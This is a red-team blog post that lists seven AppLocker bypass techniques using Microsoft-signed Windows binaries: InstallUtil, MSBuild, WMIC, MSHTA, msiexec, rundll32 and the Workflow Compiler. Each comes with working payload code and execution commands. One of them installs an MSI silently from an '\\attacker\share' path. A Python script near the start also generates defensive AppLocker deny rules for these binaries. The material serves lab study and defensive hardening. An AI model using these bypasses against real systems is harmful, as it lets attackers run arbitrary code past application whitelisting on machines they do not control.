Evading Windows Security: A List of AppLocker Bypass Techniques with LOLBAS


RedTeam LOLBas AppLocker Bypass WMIC Evasion Windows Security Defense Evasion Malware Development

πŸ” Introduction

In the previous article, we demonstrated how to bypass AppLocker using PowerShell and in-memory .NET assembly loading. That example showed how a single trusted binary can be leveraged to execute payloads without touching disk.

This follow-up expands on that concept by listing several AppLocker bypass techniques using LOLBAS (Living Off the Land Binaries and Scripts): legitimate Microsoft-signed binaries that are often allowed by default and can be abused to execute arbitrary code. This article will therefore be less detailed and more practical.


🎯 Learning Objectives

  • Configure AppLocker in a lab environment
  • Explore practical bypass techniques using LOLBAS

❓ LOLBAS

LOLBAS (Living Off the Land Binaries and Scripts) are legitimate executables, scripts, or libraries that are built into Windows and signed by Microsoft. Because they are trusted and required for normal system operation, they are often whitelisted by security controls like AppLocker. Attackers and red teamers can abuse these binaries to execute arbitrary code, download payloads, or bypass application whitelisting. The list is maintained by the LOLBAS Project: https://lolbas-project.github.io/

πŸ› οΈ Configuring AppLocker

To reproduce bypass scenarios in a lab:

  1. Run secpol.msc → Application Control Policies → AppLocker
  2. Create rules for the Executable, DLL and Script rule collections (.exe, .dll, .ps1)
  3. Set the enforcement mode to Enforce rules or Audit only

AppLocker only enforces while the Application Identity service (AppIDSvc) is running, and the DLL rule collection must be enabled explicitly on the Advanced tab, so check both before testing.
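The lab rules from step 2 can also carry explicit deny rules for the binaries this article covers. The following is an added Python example, not part of the original post, that emits AppLocker policy XML in the same format that Get-AppLockerPolicy -Xml exports, with one publisher deny rule per binary (AppLocker evaluates explicit deny rules before allow rules, so these win even if the Windows folder is allowed). The publisher string is the subject Microsoft signs Windows binaries with; the rule names and GUIDs are generated here. rundll32.exe and msiexec.exe are left out on purpose because the OS itself depends on them; they belong to the DLL and Windows Installer rule collections instead.

```python
"""Build an AppLocker policy fragment that denies the LOLBAS binaries from this
article by publisher and binary name.

Added example, not from the original post. The output follows the XML format
that Get-AppLockerPolicy -Xml exports and Set-AppLockerPolicy -XmlPolicy imports.
Enforcement defaults to AuditOnly so the rules can be validated in the AppLocker
event logs before switching to Enabled.
"""
import uuid
import xml.etree.ElementTree as ET

# Subject used to sign Windows binaries, as shown by Get-AppLockerFileInformation.
MICROSOFT_PUBLISHER = "O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"

# Binaries from this article that a workstation baseline can deny outright.
# rundll32.exe and msiexec.exe are deliberately absent: the OS relies on them,
# so they are governed by the Dll and Msi rule collections, not an Exe deny rule.
DENY_BINARIES = (
    "INSTALLUTIL.EXE",
    "MSBUILD.EXE",
    "WMIC.EXE",
    "MSHTA.EXE",
    "MICROSOFT.WORKFLOW.COMPILER.EXE",
)


def build_policy(binaries=DENY_BINARIES, enforcement="AuditOnly"):
    """Return AppLocker policy XML (str) with one publisher deny rule per binary."""
    if enforcement not in ("AuditOnly", "Enabled", "NotConfigured"):
        raise ValueError("enforcement must be AuditOnly, Enabled or NotConfigured")
    policy = ET.Element("AppLockerPolicy", Version="1")
    coll = ET.SubElement(policy, "RuleCollection", Type="Exe", EnforcementMode=enforcement)
    for binary in binaries:
        rule = ET.SubElement(
            coll, "FilePublisherRule",
            Id=str(uuid.uuid4()),                 # rule GUIDs are generated here
            Name=f"Deny LOLBAS {binary}",
            Description="Signed Windows binary commonly abused to bypass AppLocker.",
            UserOrGroupSid="S-1-1-0",             # Everyone
            Action="Deny",
        )
        conds = ET.SubElement(rule, "Conditions")
        cond = ET.SubElement(
            conds, "FilePublisherCondition",
            PublisherName=MICROSOFT_PUBLISHER, ProductName="*", BinaryName=binary,
        )
        # Any version: the binary name alone identifies what we want to deny.
        ET.SubElement(cond, "BinaryVersionRange", LowSection="*", HighSection="*")
    return ET.tostring(policy, encoding="unicode")


def denied_binaries(policy_xml):
    """Parse a policy string and return the binary names that have Deny publisher rules."""
    root = ET.fromstring(policy_xml)
    return sorted(
        c.get("BinaryName")
        for r in root.iter("FilePublisherRule") if r.get("Action") == "Deny"
        for c in r.iter("FilePublisherCondition")
    )


if __name__ == "__main__":
    # Save as lolbas-deny.xml and import with:
    #   Set-AppLockerPolicy -XmlPolicy .\lolbas-deny.xml -Merge
    print(build_policy())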

βš”οΈ AppLocker Bypass Techniques with LOLBAS

This a list of well known bypass techniques

🧹 1. InstallUtil.exe β€” Execute DLLs Without Main()

InstallUtil can execute installer classes embedded in a DLL, bypassing the need for a traditional Main() method.

Payload Code:

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Configuration.Install;

[RunInstaller(true)]
public class Payload : Installer {
  public override void Uninstall(System.Collections.IDictionary savedState) {
    Process.Start("calc.exe");
  }
}

Execution:

csc.exe /target:library /out:payload.dll Payload.cs
InstallUtil.exe /logfile= /ShowCallStack payload.dll
  • βœ… Bypasses AppLocker if InstallUtil is allowed
  • πŸ“Œ Common in environments with .NET tools installed

πŸ› οΈ 2. msbuild.exe β€” Compile and Run Inline C# from XML

MSBuild can compile and execute inline C# code embedded in a project file using CodeTaskFactory.

Payload XML:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <CodeTaskFactory AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" TaskName="Code">
      <Task>
        <Code Type="Class" Language="cs">
          <![CDATA[
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
            public class Code : Task {
              public override bool Execute() {
                System.Diagnostics.Process.Start("calc.exe");
                return true;
              }
            }
          ]]>
        </Code>
      </Task>
    </CodeTaskFactory>
  </Target>
</Project>

Execution:

msbuild.exe payload.csproj
  • βœ… Bypasses AppLocker if MSBuild is allowed
  • πŸ“Œ Often overlooked in developer workstations

☠️ 3. wmic.exe β€” WMI-Based Process Execution

WMIC can spawn processes using WMI calls, often trusted in legacy environments.

Execution:

wmic process call create "cmd.exe /c calc.exe"
  • βœ… Bypasses AppLocker if WMIC is allowed
  • πŸ“Œ Deprecated in newer Windows versions but still present

πŸ–ΌοΈ 4. mshta.exe β€” Execute VBScript or JavaScript

MSHTA can run embedded scripts via HTML or direct command-line input.

Execution:

mshta.exe "vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run \"\"calc.exe\"\":close\")"
  • βœ… Bypasses AppLocker if MSHTA is allowed
  • πŸ“Œ Common in phishing and initial access payloads

πŸ“¦ 5. msiexec.exe β€” Run Malicious MSI Installers

MSI files can contain embedded scripts or binaries. msiexec.exe can execute them silently.

Execution:

msiexec.exe /quiet /i \\attacker\share\payload.msi
  • βœ… Bypasses AppLocker if MSI execution is allowed
  • πŸ“Œ Useful for lateral movement and persistence

🧬 6. rundll32.exe β€” Execute Exported DLL Functions

rundll32.exe can invoke exported functions from DLLs, including custom payloads.

Execution:

rundll32 testdll.dll,run

DLL Code Example:

#include "stdafx.h"
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    return TRUE;
}

extern "C" __declspec(dllexport) void run() {
    MessageBoxA(NULL, "Execution happened", "Bypass", MB_OK);
}
  • βœ… Bypasses AppLocker if DLL path is trusted
  • πŸ“Œ Can be combined with DLL sideloading techniques

πŸ§ͺ 7. Microsoft.Workflow.Compiler.exe β€” Workflow Abuse

This binary can compile and execute workflow activities from a text file.

C# Payload in text.txt:

using System;
using System.Workflow.ComponentModel;
public class Run : Activity {
    public Run() {
        Console.WriteLine("I executed!");
    }
}

PowerShell Loader:

$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "text.txt"
$output = "C:\Tools\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @($compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

Execution:

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml
  • βœ… Bypasses AppLocker if Workflow Compiler is allowed
  • πŸ“Œ Rarely monitored binary with powerful capabilities

Conclusion

AppLocker is a powerful security feature, but as shown, it can be bypassed through the abuse of trusted Microsoft-signed binaries β€” the so‑called LOLBAS. these tools can all be leveraged to execute arbitrary code while remaining under the radar of traditional application whitelisting.

Stay tuned for the next article.

All the examples can be found on my github repos : https://github.com/R3dLevy/TheOffensiveDevelopmentProject

πŸ“š References

© 2025 Jude Levy